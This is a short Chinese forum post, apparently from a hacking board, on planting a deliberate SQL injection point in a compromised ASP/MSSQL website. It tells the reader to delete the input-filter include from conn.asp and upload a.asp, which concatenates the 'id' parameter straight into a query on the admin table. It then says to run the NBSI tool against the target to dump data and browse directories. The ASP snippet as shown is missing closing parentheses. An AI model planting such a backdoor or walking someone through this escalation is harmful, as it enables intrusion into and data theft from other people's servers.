自己构造SQL注入
<SPAN class=tpc_content><FONT size=2>一般的的ACCESS好构造,但是有时候提权没什么好办法时 但是MSSQL 连接的账号权利很大~能伪造个MSSQL注入点(只针对特殊情况来说)</FONT></SPAN><BR><FONT size=2>直接修改网站上的原ASP文件,把里面的过滤函数包括语句删除掉就有注入点了,一般过滤函数都inlcude在数据库连接文件conn.asp文件中.<BR>在目标上先构造一个存在注入点的文件a.asp,里面的admin表是存在的,conn.asp是数据库连接程序,记得要把conn.asp文件中过滤函数包括语句给删掉,ASP代码如下:<BR><!--#include file="conn.asp"--><BR><%<BR>dim rs,strSQL,id<BR>set rs=server.createobject("ADODB.recordset"<BR>id = request("id"<BR>strSQL = "select * from admin where id=" & id '如果没有这个admin表,可以自己建立一个表和字段<BR>rs.open strSQL,conn,1,3<BR>rs.close<BR>%><BR><BR><BR><BR>然后输入:http://目标IP/a.asp?id=1 <BR>完成了,就这么简单,其他的信息就让他全部自己暴露出来吧.打开nbsi,一顿狂注,什么信息都出来啦,慢慢的浏览着他的目录..</FONT>
页:
[1]